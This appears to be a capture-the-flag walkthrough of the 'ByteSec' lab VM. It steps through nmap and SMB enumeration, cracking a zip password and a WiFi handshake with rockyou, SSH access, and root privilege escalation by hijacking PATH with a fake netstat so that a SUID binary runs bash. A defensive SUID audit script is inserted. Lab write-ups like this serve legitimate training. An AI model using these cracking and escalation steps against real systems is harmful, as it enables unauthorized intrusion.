Byte Sec

Flags: 2 (first user and second root). Learning: exploit, SMB, Enumeration, Steganography, Privilege Escalation. We recommend that you use VirtualBox and not VMware for this VM.

URL: OS ByteSec

Difficulty: Intermediate

Author: Rahul Gehlaut


Set up the machine with a host-only adapter and run netdiscover to find its IP. On my main OS (Kali Linux) the host-only interface is eth1.

netdiscover -i eth1


Now that we have the machine's IP, scan it for open ports with nmap, saving the output to a file named "nmap", with the following command:

nmap -sS -p- -A -oN nmap


We have identified that ports 80, 139, 445 and 2525 are open. Ports 139 and 2525 are worth noting as they could be SMB. Read more about Samba shares here.

To start, port 80 is open so we will investigate this port with a browser.

web page

At first glance, the bottom of the web page has the following text:


This is also seen in the page source:


This gives us a pretty obvious hint that Samba is probably running. Let's enumerate based on this information with enum4linux, a tool for enumerating information from Windows and Samba systems.



Known usernames: administrator, guest, krbtgt, domain admins, root, bin, none.

Let's try to log into SMB with smbclient. This tool launches an ftp-like client to access SMB/CIFS resources on servers (computerhope).

Execute the following command:

smbclient // -U smb -p

To break this command down: we specify the share as //host/smb, the user with -U smb, and -p, which enables a printer service rather than a normal filespace service.


We are logged in. There are two files, main.txt and a zip archive, which we transfer to our local system with "get":

get main.txt

There doesn't seem to be anything in main.txt, so let's have a look at the archive:



The .zip file appears to be password protected. There is a tool we can use to try to crack the password by brute force.

fcrackzip is a zip file password cracker.

fcrackzip -D -p /usr/share/wordlists/rockyou.txt -u

To break down this command: -D specifies a dictionary attack, -p specifies the rockyou.txt dictionary and -u specifies the file we want to crack. The command tries to decompress the zip archive with each password in the wordlist and reports the password when one succeeds.


A password has been found:

PASSWORD FOUND!!!!: pw == hacker1

Unzipping the file with the password gives us a .cap file. A .cap file is a packet capture that can be analysed with traffic capture software such as Wireshark. Lifewire has a pretty good article on this. Let's open the file with Wireshark.

Looking at the .cap file, we see the 802.11 protocol in use. This Wireshark page explains the protocol seen in this traffic capture: Wireshark

After some research, we can identify WLAN as IEEE 802.11, so these are probably packets captured over WiFi. When analysing WiFi traffic, one can often find a 3-way handshake whenever someone joins the network. We can try to crack this .cap file for any passwords.

Let's use aircrack-ng, a tool that assesses WiFi network security. Run the following command:

aircrack-ng user.cap -w /usr/share/wordlists/rockyou.txt


Aircrack has found a password:

KEY FOUND! [ snowflake ]

There is a username that can easily be seen in the packet capture:



Now that we have a username and password, let's try logging in with SSH. If you remember, SSH was open on a different port.

cat nmap | grep ssh

SSH on port 2525.

ssh [email protected] -p 2525

ssh login

Privilege Escalation

Let’s upgrade our shell with the following command:

python -c 'import pty;pty.spawn("/bin/bash")'


There are a few different home directories for users sagar, smb and blackjax:


This next section focuses on exploiting Set User ID (SUID) binaries. This is a good article if you want to read more:

Recipe for Root

And another website on privilege escalation with a section on SUID:


The following command identifies any SUID-enabled executables owned by root on the machine:

find / -user root -perm -4000 -print 2>/dev/null


For reference, this is a list of binaries native to Linux, meaning we should not investigate any of these:
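A defender-side check that builds on the find command above, added here as an example and not part of the original writeup: it lists SUID files under a directory and flags those whose names are not on a known-good baseline, which is the same comparison done by eye in this walkthrough. The -user root filter is dropped so the demo can run unprivileged on a constructed scratch tree; the baseline names and the passwd/netscan files are constructed sample data.

```shell
#!/bin/sh
# Added example, not from the original writeup: audit SUID files against a
# known-good baseline. The page's "-user root" filter is omitted so the demo
# runs unprivileged on a scratch directory tree.

# find_suid ROOT: print every regular file under ROOT with the SUID bit set.
find_suid() {
    find "$1" -type f -perm -4000 -print 2>/dev/null | sort
}

# audit_suid ROOT BASELINE: print SUID files whose basename is NOT listed in
# BASELINE (one expected binary name per line). Anything printed is a
# candidate for closer inspection, like the non-native binary on this box.
audit_suid() {
    baseline=$2
    find_suid "$1" | while IFS= read -r f; do
        grep -qxF "$(basename "$f")" "$baseline" || printf '%s\n' "$f"
    done
}

# demo_audit: build a constructed scratch tree with one expected SUID binary
# (passwd) and one unexpected one (netscan), audit it, then clean up.
# Prints only the unexpected file's path.
demo_audit() {
    dir=$(mktemp -d)
    mkdir -p "$dir/usr/bin" "$dir/opt"
    printf '#!/bin/sh\n' > "$dir/usr/bin/passwd"         # on the baseline
    printf '#!/bin/sh\n' > "$dir/opt/netscan"            # not on the baseline
    printf 'passwd\nsudo\nmount\n' > "$dir/baseline.txt" # constructed baseline
    # set the SUID bit after writing, since the kernel clears it on write
    chmod 4755 "$dir/usr/bin/passwd" "$dir/opt/netscan"
    audit_suid "$dir" "$dir/baseline.txt"
    rm -rf "$dir"
}
```

Call demo_audit to see it on the scratch tree, or run audit_suid / /path/to/baseline.txt as root on a real host to cover files you cannot otherwise read.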


One of the binaries identified from the command:


This is evidently not native, so let's have a closer look. Run the binary with the following command:



Let’s exploit this with the following commands:

cd /tmp
echo "/bin/bash" > netstat
chmod 777 netstat
export PATH=/tmp:$PATH

These commands create a file called netstat in /tmp containing /bin/bash, give it the permissions it needs, and put /tmp at the front of PATH; export marks the environment variable to be passed on to child processes. Then the netscan binary is run again.


And we are root, with the root flag:


Written on May 21, 2020